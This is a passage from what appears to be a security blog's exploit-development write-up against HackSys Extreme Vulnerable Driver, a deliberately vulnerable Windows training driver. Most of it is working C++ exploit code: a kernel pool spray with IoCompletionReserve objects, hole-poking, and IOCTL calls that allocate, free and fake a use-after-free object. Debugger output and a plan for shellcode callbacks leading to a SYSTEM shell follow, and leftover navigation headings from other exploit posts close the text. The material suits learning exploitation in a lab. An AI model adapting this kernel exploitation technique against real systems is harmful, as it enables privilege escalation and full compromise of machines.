Next, we’ll want to poke holes in the contiguous block portion, remember? We’ll be collecting handles to these objects in vectors so that we can later free the ones we need to create the holes. The holes are already the perfect size, so we’ll just free every other contiguous block handle so that way, every hole that is created in our contiguous block will be surrounded on both sides by our objects. Let’s update our exploit code and test out the spray. Huge thanks to @tekwizz123 once again for showing in his exploit how to get NtAllocateReserveObject into the program, would’ve taken me a long time to trouble shoot those compilation errors without his help. Our spray test code:

#include <iostream>
#include <vector>
#include <Windows.h>

using namespace std;

#define DEVICE_NAME             "\\\\.\\HackSysExtremeVulnerableDriver"
#define ALLOCATE_UAF_IOCTL      0x222013
#define FREE_UAF_IOCTL          0x22201B
#define FAKE_OBJECT_IOCTL       0x22201F
#define USE_UAF_IOCTL           0x222017

vector<HANDLE> defrag_handles;
vector<HANDLE> sequential_handles;

typedef struct _LSA_UNICODE_STRING {
    USHORT Length;
    USHORT MaximumLength;
    PWSTR Buffer;
} UNICODE_STRING;

typedef struct _OBJECT_ATTRIBUTES {
    ULONG Length;
    HANDLE RootDirectory;
    UNICODE_STRING* ObjectName;
    ULONG Attributes;
    PVOID SecurityDescriptor;
    PVOID SecurityQualityOfService;
} OBJECT_ATTRIBUTES;

#define POBJECT_ATTRIBUTES OBJECT_ATTRIBUTES*

typedef NTSTATUS(WINAPI* _NtAllocateReserveObject)(
    OUT PHANDLE hObject,
    IN POBJECT_ATTRIBUTES ObjectAttributes,
    IN DWORD ObjectType);

HANDLE grab_handle() {

    HANDLE hFile = CreateFileA(DEVICE_NAME,
        FILE_READ_ACCESS | FILE_WRITE_ACCESS,
        FILE_SHARE_READ | FILE_SHARE_WRITE,
        NULL,
        OPEN_EXISTING,
        FILE_FLAG_OVERLAPPED | FILE_ATTRIBUTE_NORMAL,
        NULL);

    if (hFile == INVALID_HANDLE_VALUE) {
        cout << "[!] No handle to HackSysExtremeVulnerableDriver\n";
        exit(1);
    }

    cout << "[>] Grabbed handle to HackSysExtremeVulnerableDriver: " << hex
        << hFile << "\n";

    return hFile;
}

void create_UAF_object(HANDLE hFile) {

    cout << "[>] Creating UAF object...\n";
    BYTE input_buffer[] = "\x00";

    DWORD bytes_ret = 0x0;

    int result = DeviceIoControl(hFile,
        ALLOCATE_UAF_IOCTL,
        input_buffer,
        sizeof(input_buffer),
        NULL,
        0,
        &bytes_ret,
        NULL);

    if (!result) {

        cout << "[!] Could not create UAF object\n";
        cout << "[!] Last error: " << dec << GetLastError() << "\n";
        exit(1);
    }
    cout << "[>] UAF object allocated.\n";
}

void free_UAF_object(HANDLE hFile) {

    cout << "[>] Freeing UAF object...\n";
    BYTE input_buffer[] = "\x00";

    DWORD bytes_ret = 0x0;

    int result = DeviceIoControl(hFile,
        FREE_UAF_IOCTL,
        input_buffer,
        sizeof(input_buffer),
        NULL,
        0,
        &bytes_ret,
        NULL);

    if (!result) {

        cout << "[!] Could not free UAF object\n";
        cout << "[!] Last error: " << dec << GetLastError() << "\n";
        exit(1);
    }
    cout << "[>] UAF object freed.\n";
}

void allocate_fake_object(HANDLE hFile) {

    cout << "[>] Creating fake UAF object...\n";
    BYTE input_buffer[0x58] = { 0 };

    memset((void*)input_buffer, '\x41', 0x58);

    DWORD bytes_ret = 0x0;

    int result = DeviceIoControl(hFile,
        FAKE_OBJECT_IOCTL,
        input_buffer,
        sizeof(input_buffer),
        NULL,
        0,
        &bytes_ret,
        NULL);

    if (!result) {

        cout << "[!] Could not create fake UAF object\n";
        cout << "[!] Last error: " << dec << GetLastError() << "\n";
        exit(1);
    }
    cout << "[>] Fake UAF object created.\n";
}

void spray() {

    // thanks Tekwizz as usual
    _NtAllocateReserveObject NtAllocateReserveObject = 
        (_NtAllocateReserveObject)GetProcAddress(GetModuleHandleA("ntdll.dll"),
            "NtAllocateReserveObject");

    if (!NtAllocateReserveObject) {

        cout << "[!] Failed to get the address of NtAllocateReserve.\n";
        cout << "[!] Last error " << GetLastError() << "\n";
        exit(1);
    }

    cout << "[>] Spraying pool to defragment...\n";
    for (int i = 0; i < 10000; i++) {

        HANDLE hObject = 0x0;

        PHANDLE result = (PHANDLE)NtAllocateReserveObject((PHANDLE)&hObject,
            NULL,
            1); // specifies the correct object

        if (result != 0) {
            cout << "[!] Error allocating IoCo Object during defragmentation\n";
            exit(1);
        }
        defrag_handles.push_back(hObject);
    }
    cout << "[>] Defragmentation spray complete.\n";
    cout << "[>] Spraying sequential allocations...\n";
    for (int i = 0; i < 30000; i++) {

        HANDLE hObject = 0x0;

        PHANDLE result = (PHANDLE)NtAllocateReserveObject((PHANDLE)&hObject,
            NULL,
            1); // specifies the correct object

        if (result != 0) {
            cout << "[!] Error allocating IoCo Object during defragmentation\n";
            exit(1);
        }
        sequential_handles.push_back(hObject);
    }

    cout << "[>] Sequential spray complete.\n";

    cout << "[>] Poking 0x60 byte-sized holes in our sequential allocation...\n";
    for (int i = 0; i < sequential_handles.size(); i++) {
        if (i % 2 == 0) {
            BOOL freed = CloseHandle(sequential_handles[i]);
        }
    }
    cout << "[>] Holes poked lol.\n";
    cout << "[>] Some handles: " << hex << sequential_handles[29997] << "\n";
    cout << "[>] Some handles: " << hex << sequential_handles[29998] << "\n";
    cout << "[>] Some handles: " << hex << sequential_handles[29999] << "\n";

    Sleep(1000);
    DebugBreak();
}

int main() {

    HANDLE hFile = grab_handle();

    //create_UAF_object(hFile);

    //free_UAF_object(hFile);

    //allocate_fake_object(hFile);

    spray();

    return 0;
}

We can see after running this and looking at one of the handles we dumped to the terminal (thanks FuzzySec!), we were able to get our pool looking the way we want. 0x60 byte chunks free surrounded by our IoCo objects.

kd> !handle 0x2724c

PROCESS 86974250  SessionId: 1  Cid: 1238    Peb: 7ffdf000  ParentCid: 1554
    DirBase: bf5d4fc0  ObjectTable: abb08b80  HandleCount: 25007.
    Image: HEVDUAF.exe

Handle table at 89f1f000 with 25007 entries in use

2724c: Object: 8543b6d0  GrantedAccess: 000f0003 Entry: 88415498
Object: 8543b6d0  Type: (84ff1a88) IoCompletionReserve
    ObjectHeader: 8543b6b8 (new version)
        HandleCount: 1  PointerCount: 1


kd> !pool 8543b6d0 
Pool page 8543b6d0 region is Nonpaged pool
 8543b000 size:   60 previous size:    0  (Allocated)  IoCo (Protected)
 8543b060 size:   38 previous size:   60  (Free)       `.C.
 8543b098 size:   20 previous size:   38  (Allocated)  ReTa
 8543b0b8 size:   28 previous size:   20  (Allocated)  FSro
 8543b0e0 size:  500 previous size:   28  (Free)       Io  
 8543b5e0 size:   60 previous size:  500  (Allocated)  IoCo (Protected)
 8543b640 size:   60 previous size:   60  (Free)       IoCo
*8543b6a0 size:   60 previous size:   60  (Allocated) *IoCo (Protected)
		Owning component : Unknown (update pooltag.txt)
 8543b700 size:   60 previous size:   60  (Free)       IoCo
 8543b760 size:   60 previous size:   60  (Allocated)  IoCo (Protected)
 8543b7c0 size:   60 previous size:   60  (Free)       IoCo
 8543b820 size:   60 previous size:   60  (Allocated)  IoCo (Protected)
 8543b880 size:   60 previous size:   60  (Free)       IoCo
 8543b8e0 size:   60 previous size:   60  (Allocated)  IoCo (Protected)
 8543b940 size:   60 previous size:   60  (Free)       IoCo
 8543b9a0 size:   60 previous size:   60  (Allocated)  IoCo (Protected)
 8543ba00 size:   60 previous size:   60  (Free)       IoCo
 8543ba60 size:   60 previous size:   60  (Allocated)  IoCo (Protected)
 8543bac0 size:   60 previous size:   60  (Free)       IoCo
 8543bb20 size:   60 previous size:   60  (Allocated)  IoCo (Protected)
 8543bb80 size:   60 previous size:   60  (Free)       IoCo
 8543bbe0 size:   60 previous size:   60  (Allocated)  IoCo (Protected)
 8543bc40 size:   60 previous size:   60  (Free)       IoCo
 8543bca0 size:   60 previous size:   60  (Allocated)  IoCo (Protected)
 8543bd00 size:   60 previous size:   60  (Free)       IoCo
 8543bd60 size:   60 previous size:   60  (Allocated)  IoCo (Protected)
 8543bdc0 size:   60 previous size:   60  (Free)       IoCo
 8543be20 size:   60 previous size:   60  (Allocated)  IoCo (Protected)
 8543be80 size:   60 previous size:   60  (Free)       IoCo
 8543bee0 size:   60 previous size:   60  (Allocated)  IoCo (Protected)
 8543bf40 size:   60 previous size:   60  (Free)       IoCo
 8543bfa0 size:   60 previous size:   60  (Allocated)  IoCo (Protected)

Executing Plan

Now that we’ve confirmed our heap spray works, the next step is to implement our game-plan. We want to:

spray the heap to get it like so ^^,
allocate our UAF object,
free our UAF object,
create our fake objects with malicious callback function pointers,
activate the callback function.

All we really need to do now is allocate the shellcode, get a pointer to it, and place that pointer into our input buffer when we create our fake objects and spray those into the holes we poked so around 15,000 of them.

When we run our final code, we get our system shell!

Complete exploit code.

Conclusion

That was a pretty exaggerated exploit scenario I would guess, but it was perfect for me since I had never done a UAF exploit before. Next we’ll be doing the stack overflow again but this time on Windows 10 where we’ll have to bypass SMEP. Until next time.

Once again, big thanks to all the content producers out there for getting me through these exploits.

Normal view

Introduction

Performance

Rudimentary Snapshot Mechanism

Writing a Simple Debugger with Ptrace

Breakpoints

Snapshotting with ptrace and /proc

Register States

Snapshotting Writable Memory Sections with /proc

Restoring Snapshot

Making our Dumb Fuzzer Smart

Running The Fuzzer

Conclusion

Ideas for Improvment

Code

Some more context

An extended POC

The potential for extending this into a full RCE without chaining with file upload/control

Stumbling upon and some analysis

The disclosure

Some reflections

~~~~~~//*****//~~~~~~

Re-aligning ESP

Calling the RECV()

Second Stage / Reverse Shell

Introduction

Our Fuzzer

Small Detour, I Apologize

Vulnerable Program

Experiment 1: Passing Only One Check

Experiment 2: Passing Two Checks

How Code Coverage Tracking Can Help Us

Conclusion

~~~~~~~~~//*******//~~~~~~~~~

0x1 - Entry point and New Section address

0x3 - Restoring Original Program Instructions

0x4 - WaitForSingleObject

POP-POP-RET

Restricted characters

Egg...hunting!

Structured Exception Handling (SEH)Based Buffer Overflow Vulnerability

0x0 - Setup

0x1 - Fuzzing

0x2 - Calculating the offset

0x3 - Verifying Restricted Characters

0x5 - First Jump

0x6 - Second Jump - Egghunter

0x7 - Shellcode time!

Summer Plans

Introduction

Thanks

SMEP

Bypassing SMEP

Getting Kernel Base Address

Hunting Gadgets

CR4 Value

Restoring Execution

Conclusion

Buffer Overflow Vulnerability w/ restricted characters

~~~~~//********//~~~~~~

Fuzzing

Finding bad characters

Reverse shell time!

Final Proof-of-Concept

Structured Exception Handling (SEH)Based Buffer Overflow Vulnerability w/ Restricted Characters

Fuzzing

Calculating Offset

Finding restricted characters

POP-POP-RET...the key to SEH Based Buffer Overflow Vulnerabilities

First Jump

Second jump

Third Jump

Final Shellcode

Structured Exception Handling (SEH)Based Buffer Overflow Vulnerability

~~~~~//********//~~~~~~

Fuzzing

Proof-of-concept

Redirecting the SEH Handler

Bad characters are no bueno

SHELL TIME!

//*****//

~//*******//~

~//********//~~

~//********//~~